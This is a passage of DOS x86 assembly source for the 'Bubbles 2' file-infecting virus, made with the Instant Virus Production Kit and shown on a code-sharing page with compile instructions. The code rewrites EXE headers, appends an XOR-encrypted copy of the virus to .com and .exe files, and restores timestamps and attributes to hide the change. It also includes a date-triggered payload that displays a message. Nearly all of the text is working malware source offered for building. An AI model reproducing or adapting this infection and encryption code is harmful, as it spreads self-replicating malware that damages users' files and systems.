📄 bubbles2.asm
字号:
shl ax,cl
xchg ax,bx
les ax,[bp+offset DTA+26] ; get files size from dta
mov dx,es ; its now in dx:ax
push ax ; save these
push dx
sub ax,bx ; subtract header size from fsize
sbb dx,0 ; subtract the carry too
mov cx,10h ; convert to segment:offset form
div cx
mov word ptr [bp+buffer+14h],dx ; put in new header
mov word ptr [bp+buffer+16h],ax ; cs:ip
mov word ptr [bp+buffer+0eh],ax ; ss:sp
mov word ptr [bp+buffer+10h],id ; put id in for later
pop dx ; get the file length back
pop ax
add ax,eof-virus ; add virus size
adc dx,0 ; add with carry
mov cl,9 ; calculates new file size
push ax
shr ax,cl
ror dx,cl
stc
adc dx,ax
pop ax
and ah,1
mov word ptr [bp+buffer+4],dx ; save new file size in header
mov word ptr [bp+buffer+2],ax
push cs ; es = cs
pop es
mov cx,1ah ; Size of EXE header
FinishInfection:
push cx ; save # of bytes to write
xor cx,cx ; Set attriutes to none
call attributes
mov al,2 ; open file read/write
call open
mov ah,40h ; Write to file
lea dx,[bp+buffer] ; Location of bytes
pop cx ; Get number of bytes to write
int 21h
jc closefile
mov al,02 ; Move Fpointer to eof
Call move_fp
get_time:
mov ah,2ch ; Get time for encryption value
int 21h
cmp dh,0 ; If its seconds are zero get another
je get_time
mov [bp+enc_value],dh ; Use seconds value for encryption
call encrypt_infect ; Encrypt and infect the file
inc [bp+counter] ; Increment the counter
CloseFile:
mov ax,5701h ; Set files date/time back
mov cx,word ptr [bp+dta+16h] ; Get old time from dta
mov dx,word ptr [bp+dta+18h] ; Get old date
int 21h
mov ah,3eh ; Close file
int 21h
xor cx,cx
mov cl,byte ptr [bp+dta+15h] ; Get old Attributes
call attributes
retn
Activate:
mov ah,2ah ; Get current date
int 21h
cmp cx,1993 ; Check current Year
jb dont_activate
cmp dl,13 ; Check current Day
jne dont_activate
mov ah,2ch ; Get current time
int 21h
cmp ch,13 ; Check current hour
jne dont_activate
mov ah,9 ; Display string
lea dx,[bp+messege] ; The string to display
int 21h
mov cx,2
include .\routines\phasor.rtn ; Include file
Dont_Activate:
ret
Move_Fp:
mov ah,42h ; Move file pointer
xor cx,cx ; Al has location
xor dx,dx ; Clear these
int 21h
retn
Set_DTA:
mov ah,1ah ; Move the DTA location
int 21h ; DX has location
retn
Open:
mov ah,3dh ; open file
lea dx,[bp+DTA+30] ; Filename in DTA
int 21h
xchg ax,bx ; put file handle in bx
ret
Attributes:
mov ax,4301h ; Set attributes to cx
lea dx,[bp+DTA+30] ; filename in DTA
int 21h
ret
int24: ; New Int 24h
mov al,3 ; Fail call
iret ; Return from int 24 call
Virusname db 'Bubbles 2' ; Name Of The Virus
Author db 'Admiral Bailey' ; Author Of This Virus
messege:
db 'Bubbles 2 : Its back and better then ever.',10,13
db ' ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^',10,13
db 'Is it me or does that Make no sense at all?',10,13
Made_with db '[IVP2]',10,13,'$' ; Please do not remove this
comfilespec db '*.com',0 ; Holds type of file to look for
exefilespec db '*.exe',0 ; Holds type of file to look for
directory db '..',0 ; Directory to change to
oldjump db 0cdh,020h,0,0,0 ; Old jump. Is int 20h for file quit
Encrypt_Infect:
lea si,[bp+offset move_begin] ; Location of where to move from
lea di,[bp+offset workarea] ; Where to move it too
mov cx,move_end-move_begin ; Number of bytes to move
move_loop:
movsb ; Moves this routine into heap
loop move_loop
lea dx,[bp+offset workarea]
call dx ; Jump to that routine just moved
ret
Move_Begin equ $ ; Marks beginning of move
push bx ; Save the file handle
lea dx,[bp+offset encrypt_end]
call dx ; Call the encrypt_decrypt procedure
pop bx ; Get handle back in bx and return
mov ah,40h ; Write to file
mov cx,eof-virus ; Number of bytes
lea dx,[bp+offset virus] ; Where to write from
int 21h
push bx ; Save the file handle
lea dx,[bp+offset encrypt_end]
call dx ; Decrypt the file and return
pop bx ; Get handle back in bx and return
ret
move_end equ $ ; Marks the end of move
Encrypt_End equ $ ; Marks the end of encryption
Encrypt_Decrypt:
mov cx,encrypt_end-encrypt_start ; bytes to encrypt
lea si,cs:[bp+encrypt_start] ; start of encryption
mov di,si
encloop:
lodsb
xor ah,cs:[bp+enc_value]
stosb
loop encloop
ret
Enc_Value db 00h ; Hold the encryption value 00 for nul effect
EOF equ $ ; Marks the end of file
Counter db 0 ; Infected File Counter
Workarea db move_end-move_begin dup (?) ; Holds the encrypt_infect routine
currentdir db 64 dup (?) ; Holds the current dir
DTA db 42 dup (?) ; Location of new DTA
Buffer db 1ah dup (?) ; Holds exe header
OldInt24 dd ? ; Storage for old int 24h handler
Filler db 3000 dup (0)
eov equ $ ; Used For Calculations
code ends
end start
;---------
; Instant Virus Production Kit By Admiral Bailey - Youngsters Against McAfee
; To compile this use TASM /M FILENAME.ASM
; Then type tlink /t FILENAME.OBJ
;---------
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -